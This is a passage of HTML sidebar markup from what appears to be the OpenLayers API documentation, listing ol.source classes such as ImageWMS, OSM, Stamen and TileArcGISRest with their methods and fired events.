<li data-name="ol.source.ImageEvent#event:imageloadstart" class="unstable">
<a href="ol.source.ImageEvent.html#event:imageloadstart">imageloadstart</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.ImageStatic">
<span class="title">
<a href="ol.source.ImageStatic.html">ol.source.ImageStatic</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.ImageStatic#changed" class="unstable">
<a href="ol.source.ImageStatic.html#changed">changed</a>
</li>
<li data-name="ol.source.ImageStatic#get" class="">
<a href="ol.source.ImageStatic.html#get">get</a>
</li>
<li data-name="ol.source.ImageStatic#getAttributions" class="">
<a href="ol.source.ImageStatic.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.ImageStatic#getKeys" class="">
<a href="ol.source.ImageStatic.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.ImageStatic#getLogo" class="">
<a href="ol.source.ImageStatic.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.ImageStatic#getProjection" class="unstable">
<a href="ol.source.ImageStatic.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.ImageStatic#getProperties" class="">
<a href="ol.source.ImageStatic.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.ImageStatic#getRevision" class="unstable">
<a href="ol.source.ImageStatic.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.ImageStatic#getState" class="unstable">
<a href="ol.source.ImageStatic.html#getState">getState</a>
</li>
<li data-name="ol.source.ImageStatic#on" class="">
<a href="ol.source.ImageStatic.html#on">on</a>
</li>
<li data-name="ol.source.ImageStatic#once" class="">
<a href="ol.source.ImageStatic.html#once">once</a>
</li>
<li data-name="ol.source.ImageStatic#set" class="">
<a href="ol.source.ImageStatic.html#set">set</a>
</li>
<li data-name="ol.source.ImageStatic#setProperties" class="">
<a href="ol.source.ImageStatic.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.ImageStatic#un" class="">
<a href="ol.source.ImageStatic.html#un">un</a>
</li>
<li data-name="ol.source.ImageStatic#unByKey" class="">
<a href="ol.source.ImageStatic.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.ImageStatic#unset" class="">
<a href="ol.source.ImageStatic.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.ImageVector">
<span class="title">
<a href="ol.source.ImageVector.html">ol.source.ImageVector</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.ImageVector#changed" class="unstable">
<a href="ol.source.ImageVector.html#changed">changed</a>
</li>
<li data-name="ol.source.ImageVector#get" class="">
<a href="ol.source.ImageVector.html#get">get</a>
</li>
<li data-name="ol.source.ImageVector#getAttributions" class="">
<a href="ol.source.ImageVector.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.ImageVector#getKeys" class="">
<a href="ol.source.ImageVector.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.ImageVector#getLogo" class="">
<a href="ol.source.ImageVector.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.ImageVector#getProjection" class="unstable">
<a href="ol.source.ImageVector.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.ImageVector#getProperties" class="">
<a href="ol.source.ImageVector.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.ImageVector#getRevision" class="unstable">
<a href="ol.source.ImageVector.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.ImageVector#getSource" class="unstable">
<a href="ol.source.ImageVector.html#getSource">getSource</a>
</li>
<li data-name="ol.source.ImageVector#getState" class="unstable">
<a href="ol.source.ImageVector.html#getState">getState</a>
</li>
<li data-name="ol.source.ImageVector#getStyle" class="">
<a href="ol.source.ImageVector.html#getStyle">getStyle</a>
</li>
<li data-name="ol.source.ImageVector#getStyleFunction" class="">
<a href="ol.source.ImageVector.html#getStyleFunction">getStyleFunction</a>
</li>
<li data-name="ol.source.ImageVector#on" class="">
<a href="ol.source.ImageVector.html#on">on</a>
</li>
<li data-name="ol.source.ImageVector#once" class="">
<a href="ol.source.ImageVector.html#once">once</a>
</li>
<li data-name="ol.source.ImageVector#set" class="">
<a href="ol.source.ImageVector.html#set">set</a>
</li>
<li data-name="ol.source.ImageVector#setProperties" class="">
<a href="ol.source.ImageVector.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.ImageVector#setStyle" class="">
<a href="ol.source.ImageVector.html#setStyle">setStyle</a>
</li>
<li data-name="ol.source.ImageVector#un" class="">
<a href="ol.source.ImageVector.html#un">un</a>
</li>
<li data-name="ol.source.ImageVector#unByKey" class="">
<a href="ol.source.ImageVector.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.ImageVector#unset" class="">
<a href="ol.source.ImageVector.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.ImageWMS">
<span class="title">
<a href="ol.source.ImageWMS.html">ol.source.ImageWMS</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.ImageWMS#changed" class="unstable">
<a href="ol.source.ImageWMS.html#changed">changed</a>
</li>
<li data-name="ol.source.ImageWMS#get" class="">
<a href="ol.source.ImageWMS.html#get">get</a>
</li>
<li data-name="ol.source.ImageWMS#getAttributions" class="">
<a href="ol.source.ImageWMS.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.ImageWMS#getGetFeatureInfoUrl" class="">
<a href="ol.source.ImageWMS.html#getGetFeatureInfoUrl">getGetFeatureInfoUrl</a>
</li>
<li data-name="ol.source.ImageWMS#getImageLoadFunction" class="unstable">
<a href="ol.source.ImageWMS.html#getImageLoadFunction">getImageLoadFunction</a>
</li>
<li data-name="ol.source.ImageWMS#getKeys" class="">
<a href="ol.source.ImageWMS.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.ImageWMS#getLogo" class="">
<a href="ol.source.ImageWMS.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.ImageWMS#getParams" class="">
<a href="ol.source.ImageWMS.html#getParams">getParams</a>
</li>
<li data-name="ol.source.ImageWMS#getProjection" class="unstable">
<a href="ol.source.ImageWMS.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.ImageWMS#getProperties" class="">
<a href="ol.source.ImageWMS.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.ImageWMS#getRevision" class="unstable">
<a href="ol.source.ImageWMS.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.ImageWMS#getState" class="unstable">
<a href="ol.source.ImageWMS.html#getState">getState</a>
</li>
<li data-name="ol.source.ImageWMS#getUrl" class="">
<a href="ol.source.ImageWMS.html#getUrl">getUrl</a>
</li>
<li data-name="ol.source.ImageWMS#on" class="">
<a href="ol.source.ImageWMS.html#on">on</a>
</li>
<li data-name="ol.source.ImageWMS#once" class="">
<a href="ol.source.ImageWMS.html#once">once</a>
</li>
<li data-name="ol.source.ImageWMS#set" class="">
<a href="ol.source.ImageWMS.html#set">set</a>
</li>
<li data-name="ol.source.ImageWMS#setImageLoadFunction" class="unstable">
<a href="ol.source.ImageWMS.html#setImageLoadFunction">setImageLoadFunction</a>
</li>
<li data-name="ol.source.ImageWMS#setProperties" class="">
<a href="ol.source.ImageWMS.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.ImageWMS#setUrl" class="">
<a href="ol.source.ImageWMS.html#setUrl">setUrl</a>
</li>
<li data-name="ol.source.ImageWMS#un" class="">
<a href="ol.source.ImageWMS.html#un">un</a>
</li>
<li data-name="ol.source.ImageWMS#unByKey" class="">
<a href="ol.source.ImageWMS.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.ImageWMS#unset" class="">
<a href="ol.source.ImageWMS.html#unset">unset</a>
</li>
<li data-name="ol.source.ImageWMS#updateParams" class="">
<a href="ol.source.ImageWMS.html#updateParams">updateParams</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.source.ImageEvent#event:imageloadend" class="unstable">
<a href="ol.source.ImageEvent.html#event:imageloadend">imageloadend</a>
</li>
<li data-name="ol.source.ImageEvent#event:imageloaderror" class="unstable">
<a href="ol.source.ImageEvent.html#event:imageloaderror">imageloaderror</a>
</li>
<li data-name="ol.source.ImageEvent#event:imageloadstart" class="unstable">
<a href="ol.source.ImageEvent.html#event:imageloadstart">imageloadstart</a>
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.MapQuest">
<span class="title">
<a href="ol.source.MapQuest.html">ol.source.MapQuest</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.MapQuest#changed" class="unstable">
<a href="ol.source.MapQuest.html#changed">changed</a>
</li>
<li data-name="ol.source.MapQuest#get" class="">
<a href="ol.source.MapQuest.html#get">get</a>
</li>
<li data-name="ol.source.MapQuest#getAttributions" class="">
<a href="ol.source.MapQuest.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.MapQuest#getKeys" class="">
<a href="ol.source.MapQuest.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.MapQuest#getLayer" class="unstable">
<a href="ol.source.MapQuest.html#getLayer">getLayer</a>
</li>
<li data-name="ol.source.MapQuest#getLogo" class="">
<a href="ol.source.MapQuest.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.MapQuest#getProjection" class="unstable">
<a href="ol.source.MapQuest.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.MapQuest#getProperties" class="">
<a href="ol.source.MapQuest.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.MapQuest#getRevision" class="unstable">
<a href="ol.source.MapQuest.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.MapQuest#getState" class="unstable">
<a href="ol.source.MapQuest.html#getState">getState</a>
</li>
<li data-name="ol.source.MapQuest#getTileGrid" class="">
<a href="ol.source.MapQuest.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.MapQuest#getTileLoadFunction" class="unstable">
<a href="ol.source.MapQuest.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.MapQuest#getTileUrlFunction" class="unstable">
<a href="ol.source.MapQuest.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.MapQuest#on" class="">
<a href="ol.source.MapQuest.html#on">on</a>
</li>
<li data-name="ol.source.MapQuest#once" class="">
<a href="ol.source.MapQuest.html#once">once</a>
</li>
<li data-name="ol.source.MapQuest#set" class="">
<a href="ol.source.MapQuest.html#set">set</a>
</li>
<li data-name="ol.source.MapQuest#setProperties" class="">
<a href="ol.source.MapQuest.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.MapQuest#setTileLoadFunction" class="unstable">
<a href="ol.source.MapQuest.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.MapQuest#setTileUrlFunction" class="unstable">
<a href="ol.source.MapQuest.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.MapQuest#setUrl" class="">
<a href="ol.source.MapQuest.html#setUrl">setUrl</a>
</li>
<li data-name="ol.source.MapQuest#un" class="">
<a href="ol.source.MapQuest.html#un">un</a>
</li>
<li data-name="ol.source.MapQuest#unByKey" class="">
<a href="ol.source.MapQuest.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.MapQuest#unset" class="">
<a href="ol.source.MapQuest.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.OSM">
<span class="title">
<a href="ol.source.OSM.html">ol.source.OSM</a>
</span>
<ul class="members itemMembers">
<span class="subtitle">Members</span>
<li data-name="ol.source.OSM.ATTRIBUTION"><a href="ol.source.OSM.html#ATTRIBUTION">ATTRIBUTION</a></li>
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.OSM#changed" class="unstable">
<a href="ol.source.OSM.html#changed">changed</a>
</li>
<li data-name="ol.source.OSM#get" class="">
<a href="ol.source.OSM.html#get">get</a>
</li>
<li data-name="ol.source.OSM#getAttributions" class="">
<a href="ol.source.OSM.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.OSM#getKeys" class="">
<a href="ol.source.OSM.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.OSM#getLogo" class="">
<a href="ol.source.OSM.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.OSM#getProjection" class="unstable">
<a href="ol.source.OSM.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.OSM#getProperties" class="">
<a href="ol.source.OSM.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.OSM#getRevision" class="unstable">
<a href="ol.source.OSM.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.OSM#getState" class="unstable">
<a href="ol.source.OSM.html#getState">getState</a>
</li>
<li data-name="ol.source.OSM#getTileGrid" class="">
<a href="ol.source.OSM.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.OSM#getTileLoadFunction" class="unstable">
<a href="ol.source.OSM.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.OSM#getTileUrlFunction" class="unstable">
<a href="ol.source.OSM.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.OSM#on" class="">
<a href="ol.source.OSM.html#on">on</a>
</li>
<li data-name="ol.source.OSM#once" class="">
<a href="ol.source.OSM.html#once">once</a>
</li>
<li data-name="ol.source.OSM#set" class="">
<a href="ol.source.OSM.html#set">set</a>
</li>
<li data-name="ol.source.OSM#setProperties" class="">
<a href="ol.source.OSM.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.OSM#setTileLoadFunction" class="unstable">
<a href="ol.source.OSM.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.OSM#setTileUrlFunction" class="unstable">
<a href="ol.source.OSM.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.OSM#setUrl" class="">
<a href="ol.source.OSM.html#setUrl">setUrl</a>
</li>
<li data-name="ol.source.OSM#un" class="">
<a href="ol.source.OSM.html#un">un</a>
</li>
<li data-name="ol.source.OSM#unByKey" class="">
<a href="ol.source.OSM.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.OSM#unset" class="">
<a href="ol.source.OSM.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.Source">
<span class="title">
<a href="ol.source.Source.html">ol.source.Source</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.Source#changed" class="unstable">
<a href="ol.source.Source.html#changed">changed</a>
</li>
<li data-name="ol.source.Source#get" class="">
<a href="ol.source.Source.html#get">get</a>
</li>
<li data-name="ol.source.Source#getAttributions" class="">
<a href="ol.source.Source.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.Source#getKeys" class="">
<a href="ol.source.Source.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.Source#getLogo" class="">
<a href="ol.source.Source.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.Source#getProjection" class="unstable">
<a href="ol.source.Source.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.Source#getProperties" class="">
<a href="ol.source.Source.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.Source#getRevision" class="unstable">
<a href="ol.source.Source.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.Source#getState" class="unstable">
<a href="ol.source.Source.html#getState">getState</a>
</li>
<li data-name="ol.source.Source#on" class="">
<a href="ol.source.Source.html#on">on</a>
</li>
<li data-name="ol.source.Source#once" class="">
<a href="ol.source.Source.html#once">once</a>
</li>
<li data-name="ol.source.Source#set" class="">
<a href="ol.source.Source.html#set">set</a>
</li>
<li data-name="ol.source.Source#setProperties" class="">
<a href="ol.source.Source.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.Source#un" class="">
<a href="ol.source.Source.html#un">un</a>
</li>
<li data-name="ol.source.Source#unByKey" class="">
<a href="ol.source.Source.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.Source#unset" class="">
<a href="ol.source.Source.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.Stamen">
<span class="title">
<a href="ol.source.Stamen.html">ol.source.Stamen</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.Stamen#changed" class="unstable">
<a href="ol.source.Stamen.html#changed">changed</a>
</li>
<li data-name="ol.source.Stamen#get" class="">
<a href="ol.source.Stamen.html#get">get</a>
</li>
<li data-name="ol.source.Stamen#getAttributions" class="">
<a href="ol.source.Stamen.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.Stamen#getKeys" class="">
<a href="ol.source.Stamen.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.Stamen#getLogo" class="">
<a href="ol.source.Stamen.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.Stamen#getProjection" class="unstable">
<a href="ol.source.Stamen.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.Stamen#getProperties" class="">
<a href="ol.source.Stamen.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.Stamen#getRevision" class="unstable">
<a href="ol.source.Stamen.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.Stamen#getState" class="unstable">
<a href="ol.source.Stamen.html#getState">getState</a>
</li>
<li data-name="ol.source.Stamen#getTileGrid" class="">
<a href="ol.source.Stamen.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.Stamen#getTileLoadFunction" class="unstable">
<a href="ol.source.Stamen.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.Stamen#getTileUrlFunction" class="unstable">
<a href="ol.source.Stamen.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.Stamen#on" class="">
<a href="ol.source.Stamen.html#on">on</a>
</li>
<li data-name="ol.source.Stamen#once" class="">
<a href="ol.source.Stamen.html#once">once</a>
</li>
<li data-name="ol.source.Stamen#set" class="">
<a href="ol.source.Stamen.html#set">set</a>
</li>
<li data-name="ol.source.Stamen#setProperties" class="">
<a href="ol.source.Stamen.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.Stamen#setTileLoadFunction" class="unstable">
<a href="ol.source.Stamen.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.Stamen#setTileUrlFunction" class="unstable">
<a href="ol.source.Stamen.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.Stamen#setUrl" class="">
<a href="ol.source.Stamen.html#setUrl">setUrl</a>
</li>
<li data-name="ol.source.Stamen#un" class="">
<a href="ol.source.Stamen.html#un">un</a>
</li>
<li data-name="ol.source.Stamen#unByKey" class="">
<a href="ol.source.Stamen.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.Stamen#unset" class="">
<a href="ol.source.Stamen.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.Tile">
<span class="title">
<a href="ol.source.Tile.html">ol.source.Tile</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.Tile#changed" class="unstable">
<a href="ol.source.Tile.html#changed">changed</a>
</li>
<li data-name="ol.source.Tile#get" class="">
<a href="ol.source.Tile.html#get">get</a>
</li>
<li data-name="ol.source.Tile#getAttributions" class="">
<a href="ol.source.Tile.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.Tile#getKeys" class="">
<a href="ol.source.Tile.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.Tile#getLogo" class="">
<a href="ol.source.Tile.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.Tile#getProjection" class="unstable">
<a href="ol.source.Tile.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.Tile#getProperties" class="">
<a href="ol.source.Tile.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.Tile#getRevision" class="unstable">
<a href="ol.source.Tile.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.Tile#getState" class="unstable">
<a href="ol.source.Tile.html#getState">getState</a>
</li>
<li data-name="ol.source.Tile#getTileGrid" class="">
<a href="ol.source.Tile.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.Tile#on" class="">
<a href="ol.source.Tile.html#on">on</a>
</li>
<li data-name="ol.source.Tile#once" class="">
<a href="ol.source.Tile.html#once">once</a>
</li>
<li data-name="ol.source.Tile#set" class="">
<a href="ol.source.Tile.html#set">set</a>
</li>
<li data-name="ol.source.Tile#setProperties" class="">
<a href="ol.source.Tile.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.Tile#un" class="">
<a href="ol.source.Tile.html#un">un</a>
</li>
<li data-name="ol.source.Tile#unByKey" class="">
<a href="ol.source.Tile.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.Tile#unset" class="">
<a href="ol.source.Tile.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.TileArcGISRest">
<span class="title">
<a href="ol.source.TileArcGISRest.html">ol.source.TileArcGISRest</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.TileArcGISRest#changed" class="unstable">
<a href="ol.source.TileArcGISRest.html#changed">changed</a>
</li>
<li data-name="ol.source.TileArcGISRest#get" class="">
<a href="ol.source.TileArcGISRest.html#get">get</a>
</li>
<li data-name="ol.source.TileArcGISRest#getAttributions" class="">
<a href="ol.source.TileArcGISRest.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.TileArcGISRest#getKeys" class="">
<a href="ol.source.TileArcGISRest.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.TileArcGISRest#getLogo" class="">
<a href="ol.source.TileArcGISRest.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.TileArcGISRest#getParams" class="unstable">
<a href="ol.source.TileArcGISRest.html#getParams">getParams</a>
</li>
<li data-name="ol.source.TileArcGISRest#getProjection" class="unstable">
<a href="ol.source.TileArcGISRest.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.TileArcGISRest#getProperties" class="">
<a href="ol.source.TileArcGISRest.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.TileArcGISRest#getRevision" class="unstable">
<a href="ol.source.TileArcGISRest.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.TileArcGISRest#getState" class="unstable">
<a href="ol.source.TileArcGISRest.html#getState">getState</a>
</li>
<li data-name="ol.source.TileArcGISRest#getTileGrid" class="">
<a href="ol.source.TileArcGISRest.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.TileArcGISRest#getTileLoadFunction" class="unstable">
<a href="ol.source.TileArcGISRest.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.TileArcGISRest#getTileUrlFunction" class="unstable">
<a href="ol.source.TileArcGISRest.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.TileArcGISRest#getUrls" class="">
<a href="ol.source.TileArcGISRest.html#getUrls">getUrls</a>
</li>
<li data-name="ol.source.TileArcGISRest#on" class="">
<a href="ol.source.TileArcGISRest.html#on">on</a>
</li>
<li data-name="ol.source.TileArcGISRest#once" class="">
<a href="ol.source.TileArcGISRest.html#once">once</a>
</li>
<li data-name="ol.source.TileArcGISRest#set" class="">
<a href="ol.source.TileArcGISRest.html#set">set</a>
</li>
<li data-name="ol.source.TileArcGISRest#setProperties" class="">
<a href="ol.source.TileArcGISRest.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.TileArcGISRest#setTileLoadFunction" class="unstable">
<a href="ol.source.TileArcGISRest.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.TileArcGISRest#setTileUrlFunction" class="unstable">
<a href="ol.source.TileArcGISRest.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.TileArcGISRest#setUrl" class="">
<a href="ol.source.TileArcGISRest.html#setUrl">setUrl</a>
</li>
<li data-name="ol.source.TileArcGISRest#setUrls" class="">
<a href="ol.source.TileArcGISRest.html#setUrls">setUrls</a>
</li>
<li data-name="ol.source.TileArcGISRest#un" class="">
<a href="ol.source.TileArcGISRest.html#un">un</a>
</li>
<li data-name="ol.source.TileArcGISRest#unByKey" class="">
<a href="ol.source.TileArcGISRest.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.TileArcGISRest#unset" class="">
<a href="ol.source.TileArcGISRest.html#unset">unset</a>
</li>
<li data-name="ol.source.TileArcGISRest#updateParams" class="">
<a href="ol.source.TileArcGISRest.html#updateParams">updateParams</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.TileDebug">
<span class="title">
<a href="ol.source.TileDebug.html">ol.source.TileDebug</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
